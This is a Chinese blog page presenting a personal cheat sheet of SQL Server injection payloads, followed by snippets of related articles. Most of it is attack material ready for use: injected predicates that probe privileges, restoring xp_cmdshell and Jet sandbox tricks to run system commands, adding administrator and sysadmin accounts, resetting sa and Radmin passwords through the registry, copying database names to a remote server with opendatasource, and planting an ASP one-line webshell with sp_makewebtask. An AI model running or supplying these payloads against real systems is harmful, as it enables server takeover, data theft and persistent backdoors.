个人整理常用注入命令

最新推荐文章于 2022-11-22 13:16:23 发布
最新推荐文章于 2022-11-22 13:16:23 发布
阅读量767 收藏
点赞数
分类专栏: 网络安全 文章标签: microsoft system xp parameters 数据库 server

 

个人整理常用注入命令

我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!
 
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
 
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
 
 
数字类型
and char(124)%2Buser%2Bchar(124)=0
 
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
 
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
 
爆用户名
 and user>0
' and user>0 and ''='
 
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
 
检测是不是MSSQL数据库
and exists (select * from sysobjects);--
 
检测是否支持多行
;declare @d int;--
 
恢复xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
 
 
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
 
//-----------------------
//      执行命令
//-----------------------
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
 
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
 
执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
 
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
 
判断xp_cmdshell扩展存储过程是否存在:
http://www.2cto.com /display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
 
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
 
REG_SZ
 
读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
 
读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1
 
 
数据库备份
backup database pubs to disk = 'c:\123.bak'
 
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
 
 
 
更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'
 
添加和删除一个SA权限的用户test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
 
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
 
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
 
 
停掉或激活某个服务。
 
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
 
dbo.xp_subdirs
 
只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
 
dbo.xp_makecab
 
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
 
dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
 
xp_terminate_process
 
停掉某个执行中的程序,但赋予的参数是Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选pid,就可以看到每个执行程序的Process ID
 
xp_terminate_process 2484
 
xp_unpackcab
 
解开压缩档。
 
xp_unpackcab 'c:\test.cab','c:\temp',1
 
 
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
 
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
 
//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
 
 
//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
 
用sp_makewebtask直接在web目录里写入一句话马:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
 
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
 
//删除内容
delete from table_name where Stockid = 3

 
http://hi.baidu.com/hacklele/item/9c49493a276e4ffddf2221d7
l460602540
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿D常用的一些注入命令整理小结
10-30
阿D常用注入命令
常见的Web漏洞——命令注入
热门推荐
江左盟的博客
09-29 1万+
目录 命令注入简介 命令注入原理 漏洞利用 漏洞防范 总结 命令注入简介 命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令的web应用中,如内容管理系统(CMS)等。 命令注入原理 本文以DVWA中的Command Injection为例,查看...
常见操作系统命令注入思路
牛叫兽的测试学习和分享
12-16 6063
渗透测试技能:命令注入思路总结
windows十种注入方式
活下去,学下去
09-13 5306
进程注入是一种广泛应用于恶意软件和无文件攻击中的逃避技术,这需要在另一个进程的地址空间内运行自定义代码。进程注入提高了隐蔽性,一些技术也实现了持久性。 尽管有许多流程注入技术,在本博客中,我提供了十种在现实看到注入另一个进程运行恶意代码的技术。 我还提供了许多这些技术的屏幕截图,以便于逆向工程和恶意软件分析,协助针对这些常见技术进行检测和防御。 1. 经典的DLL注入方式 经典的DLL注入方式:通过CREATEREMOTETHREAD和LOADLIBRARY进行注入。 这种技术是用于将恶意软件注入另一
【web-攻击后端组件】(7.1)注入操作系统命令:Perl、ASP、动态执行、OS命令注入
08-20 497
注入操作系统命令】Perl、ASP、动态执行、OS命令注入
windows注入的方法
清凝
11-22 738
本文总结了Windows常见的注入方式
sql注入常用命令
09-18
sql注入常用命令个人总结,适合一些小白使用,大神可以了解了解,有错请指出。
常用的一些注入命令
08-29
常用的一些注入命令,用于查询网站是否存在注入点。
命令注入讲解ppt.pptx
08-10
命令注入的一些基础知识讲解
详解php命令注入攻击
10-17
主要介绍了php命令注入攻击,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
命令注入总结
weixin_44576725的博客
12-15 6140
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
常用的一些注入命令,方便一下大家
05-24 737
我记性不好,所以把常用注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!//看看是什么权限的and 1=(Select IS_MEMBER(db_owner))And char(124)%2BCast(IS_MEMBER(db_owner) as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HA
命令注入_常见web漏洞——系统命令注入
weixin_39540020的博客
01-05 2858
在本文中,我将讲述什么是系统命令注入以及如何检测和利用系统注入漏洞。并且会罗列一些针对不同操作系统比较有用的攻击命令和技术。最后则将讲述如何阻止系统命令注入攻击。什么是系统命令注入?操作系统命令注入(通常也称为脚本注入(Shell Injection))是一种web安全漏洞。攻击者可以利用其在运行应用的服务器执行任意操作系统命令。典型的后果是完全破坏应用程序及其所有数据。通常,攻击者还能...
sql in 收集
jianghl_soft的专栏
06-06 447
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0and 03.猜帐号数目 如果遇到0and 0and 14.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*) >
常用的一些注入命令,方便一下大家哦
魔拉宝
08-07 561
//看看是什么权限的and 1=(Select IS_MEMBER(db_owner))And char(124)%2BCast(IS_MEMBER(db_owner) as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS(master))And char(124)%2
关于命令执行/注入 以及常见的一些绕过过滤的方法
小白渣的博客
02-29 1万+
打开题目直接给了源码, <?php $str=""; if(!empty($_GET)){ $str=$_GET["calc"]; } ?> 以及<?php echo "result:".shell_exec("echo $str | bc"); ?> 可以看出其没有对用户输入的内容进行一定过滤直接传给shell_exec函数执行。所以存在命令行漏洞。 这...
命令注入利用语句
weixin_30556161的博客
08-15 159
命令注入中可以使用的命令 1. 使用&符号,这个代表且,第一个命令执行错误时,第二个不执行 system('cat $_GET[a]'); 利用脚本a=2.txt'&ifconfig 2. 使用|符号,代表或,第一个命令执行正确时,第二个命令不执行 system('cat $_GET[a]'); 利用脚本a=12312313'|ifconfig 构造错误语句,...
mysql 常用注入命令_SQL注入常用命令
weixin_28585773的博客
01-19 1185
1. 数据库查询版本Mssql select @@versionMysql select vresion()/select @@versionoracle select banner from ¥versionPostgresql select version()2. 数据库常用命令库操作连接数据库 mysql -u 用户名 -p创建数据库:create databa...
sql常用注入命令有哪些
最新发布
03-06
SQL injection(结构化查询语言注入)是一种常见的网络攻击手段,它指的是利用网站的输入字段插入恶意的SQL代码,从而对数据库进行操作(例如查询、修改或删除数据)。 下面是一些常见的SQL injection命令: - `' OR 1=1--`:这是一种经典的注入命令,它可以在输入字段中插入恶意代码,使得数据库会忽略后面的条件并返回所有数据。 - `' OR 'a'='a`:这种命令也可以让数据库忽略后面的条件,并返回所有数据。 - `'; DROP TABLE table_name;--`:这条命令可以删除数据库中的表。 - `'; INSERT INTO table_name (column1, column2, column3) VALUES (value1, value2, value3);--`:这条命令可以向数据库中的表插入新的数据。 请注意,这些命令只是SQL injection的一部分,并不是所有的注入命令。这些命令也不能保证在所有情况下都能使用。使用这些命令的前提是网站的数据库配置不当,导致了SQL injection的漏洞。为了防止SQL injection攻击,建议对网站的数据库进行安全配置,并使用专业的安全工具进行检测和修复。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值